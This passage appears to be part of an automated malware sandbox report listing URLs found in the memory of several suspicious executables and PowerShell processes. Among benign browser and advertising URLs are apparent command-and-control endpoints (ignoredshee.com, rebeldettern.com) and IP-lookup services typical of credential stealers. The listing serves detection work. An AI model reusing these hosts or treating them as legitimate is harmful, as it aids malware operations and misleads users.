Source: 0a633717d1.exe, 00000017.00000003.2412770478.0000000005937000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2501375615.0000000005AA7000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2729963633.000000000579D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 0a633717d1.exe, 00000017.00000003.2412770478.0000000005937000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2501375615.0000000005AA7000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2729963633.000000000579D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 0a633717d1.exe, 00000017.00000003.2365691577.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2366303107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2365409051.00000000058CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2443915695.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2446397183.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2441705824.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2602065865.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2599280536.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2605147050.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000009.00000002.1504406179.0000025980001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1465861464.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2670950319.0000000004B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: 6d81c0d08d.exe	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE
Source: 6d81c0d08d.exe, 00000015.00000002.2888528335.0000000000D12000.00000040.00000001.01000000.00000012.sdmp, 6d81c0d08d.exe, 00000015.00000003.2287725007.0000000005330000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: 6d81c0d08d.exe	String found in binary or memory: https://api.ipify.orgcookies//setti
Source: 6d81c0d08d.exe, 00000015.00000002.2888528335.0000000000D12000.00000040.00000001.01000000.00000012.sdmp, 6d81c0d08d.exe, 00000015.00000003.2287725007.0000000005330000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: 0a633717d1.exe, 00000017.00000003.2417349208.000000000591E000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2517882625.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2756467433.0000000005722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: 0a633717d1.exe, 00000017.00000003.2417349208.000000000591E000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2517882625.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2756467433.0000000005722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: 0a633717d1.exe, 00000017.00000003.2365691577.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2366303107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2365409051.00000000058CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2443915695.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2446397183.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2441705824.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2602065865.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2599280536.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2605147050.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0a633717d1.exe, 00000017.00000003.2365691577.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2366303107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2365409051.00000000058CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2443915695.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2446397183.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2441705824.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2602065865.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2599280536.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2605147050.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0a633717d1.exe, 00000017.00000003.2365691577.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2366303107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2365409051.00000000058CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2443915695.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2446397183.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2441705824.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2602065865.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2599280536.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2605147050.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 0a633717d1.exe, 00000017.00000003.2417349208.000000000591E000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2517882625.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2756467433.0000000005722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 0a633717d1.exe, 00000017.00000003.2417349208.000000000591E000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2517882625.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2756467433.0000000005722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000023.00000002.2749262657.0000000005B78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000023.00000002.2749262657.0000000005B78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000023.00000002.2749262657.0000000005B78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: 0a633717d1.exe, 00000017.00000003.2365691577.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2366303107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2365409051.00000000058CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2443915695.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2446397183.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2441705824.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2602065865.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2599280536.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2605147050.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0a633717d1.exe, 00000017.00000003.2365691577.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2366303107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2365409051.00000000058CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2443915695.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2446397183.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2441705824.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2602065865.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2599280536.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2605147050.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0a633717d1.exe, 00000017.00000003.2365691577.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2366303107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2365409051.00000000058CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2443915695.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2446397183.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2441705824.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2602065865.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2599280536.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2605147050.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000037.00000003.2667655884.0000027CAAF21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: powershell.exe, 00000023.00000002.2670950319.0000000004C66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1465861464.0000000005927000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1504406179.0000025980C2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2670950319.00000000053A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: 376bb929a5.exe, 0000001C.00000003.2582785648.0000000001091000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2657033089.0000000001103000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2729667191.0000000005691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/
Source: 376bb929a5.exe, 00000018.00000003.2677561240.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2689656653.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2812406480.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2737639517.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2930657482.0000000005A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/1
Source: 376bb929a5.exe, 0000001C.00000003.2696430656.0000000001110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/=C:
Source: 376bb929a5.exe, 0000001C.00000003.2582785648.0000000001091000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/V
Source: 376bb929a5.exe, 00000018.00000003.2748336037.000000000131A000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2800041996.000000000131A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/a
Source: 376bb929a5.exe, 00000018.00000003.2500684816.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2533412280.0000000005A71000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2534134998.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2533537467.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2502282465.0000000005A7C000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2534629875.0000000005A7C000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2535046976.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2501375615.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/akP
Source: 376bb929a5.exe, 0000001C.00000003.2582785648.0000000001091000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2699698244.0000000005721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/api
Source: 376bb929a5.exe, 0000001C.00000003.2583352364.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2582785648.0000000001091000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/api8
Source: 376bb929a5.exe, 0000001C.00000003.2884242604.0000000001110000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2929658581.0000000001110000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2696430656.0000000001110000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2657033089.0000000001110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apiDENT2
Source: 376bb929a5.exe, 00000018.00000003.2501903368.0000000005A85000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2500684816.0000000005A85000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2517882625.0000000005A85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apicRVe--
Source: 376bb929a5.exe, 0000001C.00000003.2882824124.00000000010F2000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2884242604.0000000001107000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2873139387.00000000010ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apij
Source: 376bb929a5.exe, 0000001C.00000003.2695213966.0000000005721000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2699698244.0000000005721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apinYPI
Source: 376bb929a5.exe, 0000001C.00000003.2583352364.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2582785648.0000000001091000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apix
Source: 376bb929a5.exe, 0000001C.00000003.2583167228.000000000107A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/c
Source: 376bb929a5.exe, 0000001C.00000003.2929658581.0000000001110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/dy
Source: 376bb929a5.exe, 0000001C.00000003.2657033089.0000000001110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/e
Source: 376bb929a5.exe, 0000001C.00000003.2657033089.0000000001110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/er
Source: 376bb929a5.exe, 0000001C.00000003.2696430656.0000000001110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/mF
Source: 376bb929a5.exe, 0000001C.00000003.2929658581.0000000001110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/opQ
Source: 376bb929a5.exe, 0000001C.00000003.2696430656.0000000001110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/pi
Source: 376bb929a5.exe, 00000018.00000003.2533412280.0000000005A71000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2677561240.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2534134998.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2689656653.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2533537467.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2534629875.0000000005A7C000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2535046976.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2812406480.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2737639517.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/sw
Source: 376bb929a5.exe, 00000018.00000003.2673492338.000000000131A000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2725915516.000000000131A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/t
Source: 376bb929a5.exe, 0000001C.00000003.2583167228.000000000107A000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2931663607.000000000107A000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2898377306.000000000107A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com:443/api
Source: 376bb929a5.exe, 0000001C.00000003.2879053676.000000000107A000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2931663607.000000000107A000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2898377306.000000000107A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com:443/apiNbzsd
Source: 376bb929a5.exe, 0000001C.00000003.2931663607.000000000107A000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2898377306.000000000107A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com:443/apil
Source: 376bb929a5.exe, 0000001C.00000003.2756467433.0000000005722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: 6d81c0d08d.exe, 6d81c0d08d.exe, 00000015.00000002.2888528335.0000000000D12000.00000040.00000001.01000000.00000012.sdmp, 6d81c0d08d.exe, 00000015.00000003.2287725007.0000000005330000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: powershell.exe, 00000006.00000002.1468172862.000000000638A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1544695281.0000025990073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1544695281.00000259901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2749262657.0000000005B78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 0a633717d1.exe, 00000017.00000002.2620798729.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2560184062.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2382176027.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2435677601.0000000005927000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2387242476.0000000005911000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2385740178.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000002.2620798729.0000000000B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/
Source: 0a633717d1.exe, 00000017.00000003.2560184062.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000002.2620798729.0000000000B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com//
Source: 0a633717d1.exe, 00000017.00000003.2560184062.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000002.2620798729.0000000000B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/O
Source: 0a633717d1.exe, 00000017.00000003.2543781216.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2560184062.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000002.2638351102.0000000000BAC000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2489296234.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2564882043.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2560184062.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2344691415.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2523398274.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2564882043.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/api
Source: 0a633717d1.exe, 00000017.00000003.2410386951.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/api3
Source: 0a633717d1.exe, 00000017.00000003.2395999034.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/apiru
Source: 0a633717d1.exe, 00000017.00000003.2571973990.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2543781216.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000002.2638351102.0000000000BAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/apiu
Source: 0a633717d1.exe, 00000017.00000003.2433755777.0000000005926000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2435677601.0000000005927000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/g
Source: 0a633717d1.exe, 00000017.00000003.2344847247.0000000000B32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/h
Source: 0a633717d1.exe, 00000017.00000003.2409715160.0000000005918000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2382176027.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2489296234.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com:443/api
Source: 376bb929a5.exe, 0000001C.00000003.2751029680.00000000059BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 376bb929a5.exe, 0000001C.00000003.2751029680.00000000059BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 0a633717d1.exe, 00000017.00000003.2417349208.000000000591E000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2517882625.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2756467433.0000000005722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: 0a633717d1.exe, 00000017.00000003.2344691415.0000000000B60000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2344621526.0000000000BA1000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2344847247.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2583167228.0000000001074000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 0a633717d1.exe, 00000017.00000003.2344691415.0000000000B60000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2344621526.0000000000BA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: 0a633717d1.exe, 00000017.00000003.2365691577.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2366303107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2365409051.00000000058CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2443915695.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2446397183.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2441705824.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2602065865.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2599280536.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2605147050.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0a633717d1.exe, 00000017.00000003.2365691577.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2366303107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2365409051.00000000058CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2443915695.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2446397183.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2441705824.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2602065865.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2599280536.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2605147050.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 0a633717d1.exe, 00000017.00000003.2417349208.000000000591E000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2517882625.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2756467433.0000000005722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
